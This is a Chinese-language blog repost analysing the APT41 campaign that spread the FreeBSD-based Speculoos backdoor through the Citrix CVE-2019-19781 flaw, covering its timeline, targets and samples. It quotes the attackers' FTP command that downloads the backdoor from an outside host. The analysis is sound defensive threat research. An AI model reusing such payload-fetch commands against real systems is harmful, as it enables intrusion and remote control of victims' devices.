Speculoos后门分析:利用CVE-2019-19781漏洞进行传播

本文详细分析了APT41组织利用CVE-2019-19781漏洞传播的Speculoos后门,该后门是一个在FreeBSD系统上运行的ELF可执行文件,通过TCP/443与C2服务器通信。攻击者主要针对医疗、教育和咨询等行业,利用Citrix漏洞进行攻击,实现远程命令执行,获取对受害者系统的完全控制。
摘要由CSDN通过智能技术生成

背景

3月25日,FireEye发布了一篇关于APT41组织近期攻击活动的文章。该攻击活动日期为1月20日——3月11日,主要利用近期公布的安全漏洞利用来攻击Citrix、Cisco、Zoho等网络应用。根据WildFire和AutoFocus数据,研究人员获得了攻击Citrix的payload样本,是运行在FreeBSD上编译的可执行文件。研究人员使用该数据发现了受害者遍布全球,位于医疗、高等教育、支付和技术服务等领域,包括北美、南美和欧洲。

本文分析攻击活动中的基于FreeBSD 的payload——Speculoos。研究人员从数据集中一共发现了5个样本,文件大小几乎一样,但也有一些差异。这些细微的差异表明这些样本来源于同一开发者,样本可能被重新编译或打包了。如FireEye分析,Speculoos是利用CVE-2019-19781漏洞进行传播的,CVE-2019-19781是一个远程任意命令执行漏洞,影响Citrix Application Delivery Controller、Citrix Gateway、Citrix SD-WAN WANOP等设备。

攻击技术细节

在攻击活动中,攻击者利用了CVE-2019-19781漏洞来指导受害者应用使用命令/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/<filename> 通过FTP来提取Speculoos 后门。攻击活动中第一波开始于2020年1月31日,使用的文件为bsd,受影响的主要是美国的高等教育机构、医疗健康行业和一家位于爱尔兰的咨询公司。第二波攻击活动开始于2020年2月24日,使用的文件名为un。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值